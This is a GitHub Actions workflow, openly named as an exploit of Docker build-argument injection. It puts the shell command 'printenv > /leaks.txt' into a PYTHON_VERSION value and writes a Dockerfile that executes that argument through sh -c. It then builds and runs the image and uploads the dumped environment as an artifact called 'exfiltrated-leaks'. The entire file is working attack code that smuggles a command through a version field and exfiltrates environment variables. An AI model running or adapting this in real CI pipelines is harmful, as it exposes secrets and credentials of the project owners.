name: Exploit Docker ARG Injection

on:
  push:

jobs:
  exfiltrate-secrets:
    runs-on: ubuntu-latest
    env:
      PYTHON_VERSION: 'printenv > /leaks.txt'
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Write malicious Dockerfile
        run: |
          echo 'FROM python:3.11-alpine' > Dockerfile
          echo 'ARG PYTHON_VERSION' >> Dockerfile
          echo 'RUN echo "Running injected command..." && sh -c "${PYTHON_VERSION}" || true' >> Dockerfile

      - name: Build with injected ARG
        run: docker build -t exploited --build-arg PYTHON_VERSION="$PYTHON_VERSION" .

      - name: Run container and extract leak
        run: docker run --rm exploited cat /leaks.txt > leaked.txt

      - name: Upload leak
        uses: actions/upload-artifact@v4
        with:
          name: exfiltrated-leaks
          path: leaked.txt
